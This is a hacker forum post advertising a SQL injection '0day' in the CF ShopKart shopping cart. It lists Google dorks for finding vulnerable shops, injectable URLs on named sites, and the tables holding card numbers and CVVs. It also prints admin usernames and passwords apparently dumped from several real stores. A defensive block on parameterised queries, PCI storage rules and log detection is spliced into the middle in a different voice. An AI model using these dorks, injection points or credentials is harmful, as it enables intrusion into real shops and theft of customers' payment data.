The_Arhitect

0Day Exploit 1 - Shopping Cart.

# Exploit Title: CF Shopkart Shopping Site Engine [MSAccess & MySQL SQL Injection] 0day
# Date: 12/1/12
# Author: Srblche
# Vendor or Software Link: http://www.webstoresltd.com/webstores.cfm and www.cfshopkart.com/
# Version: v4.x.x - v5.x.x
# Category: Webapps
# Google dork: inurl:.cfm?Action=ViewDetails + "Website Content for"
# Tested on: Windows 7 and Backtrack

## 18,600 results

## EXPLOIT: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=1 [SQLi HERE]

Vuln Link: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=29

In Depth Analysis: Most CF ShopKart scripts run on either MSAccess or MySQL v5 databases. However, we can get through both. The admin directory is always located at /admin/
This 0day was made for Srblche.
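For the defender reading this thread: the root cause described above is a ColdFusion page that places the `ItemID` request parameter straight into a `cfquery` SQL string. The following is an added illustration, not CF ShopKart's actual source (which this post does not show); the query text, column names (`Products`, `ItemID`) and the `ViewDetails` action name are assumptions made for the example. It shows the string-concatenation pattern beside the hardened version that uses `cfqueryparam`, which sends the value as a typed bind parameter so the database never parses it as SQL.

```cfml
<!--- VULNERABLE (illustrative): the URL parameter is concatenated into the SQL text.
      Any quote or operator in ItemID changes the statement the database executes. --->
<cfif url.action EQ "ViewDetails">
    <cfquery name="getItem" datasource="#application.dsn#">
        SELECT ItemID, ItemName, Price
        FROM Products
        WHERE ItemID = #url.ItemID#
    </cfquery>
</cfif>

<!--- HARDENED: validate the type first, then bind the value with cfqueryparam.
      The parameter travels separately from the statement text, so it can only
      ever be compared as an integer, never interpreted as SQL. --->
<cfif url.action EQ "ViewDetails">
    <cfif NOT isValid("integer", url.ItemID)>
        <cfthrow type="InvalidParameter" message="ItemID must be an integer.">
    </cfif>
    <cfquery name="getItem" datasource="#application.dsn#">
        SELECT ItemID, ItemName, Price
        FROM Products
        WHERE ItemID = <cfqueryparam value="#url.ItemID#" cfsqltype="cf_sql_integer">
    </cfquery>
</cfif>
```

The same change applies to every other request parameter that reaches a query (`Category`, `carttoken`, search terms, and so on), and the `cfsqltype` should match the real column type. Independently of the injection fix, the tables this post points at illustrate a second problem: card numbers, expiry dates and confirmation codes should not be stored by the shop at all (PCI DSS forbids retaining the security code after authorization), and the `users` table should hold salted password hashes rather than the cleartext values shown further down. Sites running this engine should also check their web server logs for requests to `ViewDetails` with non-numeric `ItemID` values, which is the simplest detection signal for attempts of this kind.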

---------------------
TABLE [orders] CONTAINS CREDIT CARD NUMBERS, EXPIRY and SECURITY CODES
TABLE [users] CONTAINS ADMIN INFO
ADMIN PANEL LINK WILL ALWAYS BE AT [/admin]
---------------------
MSACCESS HELP - [+]

Table Names of CF ShopKart --
categories
checkoutheader
companyinfo
contacts
customerhistory
discounts
emaillist
gallery
gallerycats
gallerycomments
gallerynotes
graphics
help
homepage
imagecategories
ipcountries
links
logins
options
order_no
orderdetails
orders --------------------------->> CreditCardType,CreditCardNumber,CreditCardExpire,CCConfirmationNumber
pages
products
promos
sales
sellingareas
sentmessages
settings
settings2
shippingsurcharges
shippingtable1
shippingtable2
shippingtable3
shippingtable4
shippingtable5
shippingtypes
shoppingcarts
stats
stats_archive
storeheader
taxes
temporders
upsconfig
users ---------------------------------->> UserID,UserName,Password,UserLevel
wishlistitems
wishlists
--------------------------------------------------------------------------------

https://www.streetsourceleds.com/(secure)/admin//admin.cfm

Data Found: UserID,UserName,Password,UserLevel=20^admin^incentives^Admin
Data Found: UserID,UserName,Password,UserLevel=22^stalerico^kazoo^Admin

CVV's in only some orders.
--------------------------------------------------------------------------------

https://www.zijagear.com/shop/admin/admin.cfm

admin:taylor12

(paypal shop, no cc's found unless setting changed in options to store cc details)
--------------------------------------------------------------------------------


EDIT NEW DORK : intext:"Powered by CFShopKart" 1 MORE DORK: inurl:/index.cfm?carttoken=

(About 317,000 results (0.37 seconds) http://www.ktlcc.com/handwsportshop.com/shop/admin


admin:taylor12

=============================================================

http://www.augersidekick.com

Column Data: admin
Data Found: username=admin
Length of 'Column Data' is 10
Column Data: chrisnmarc
Data Found: password=chrisnmarc
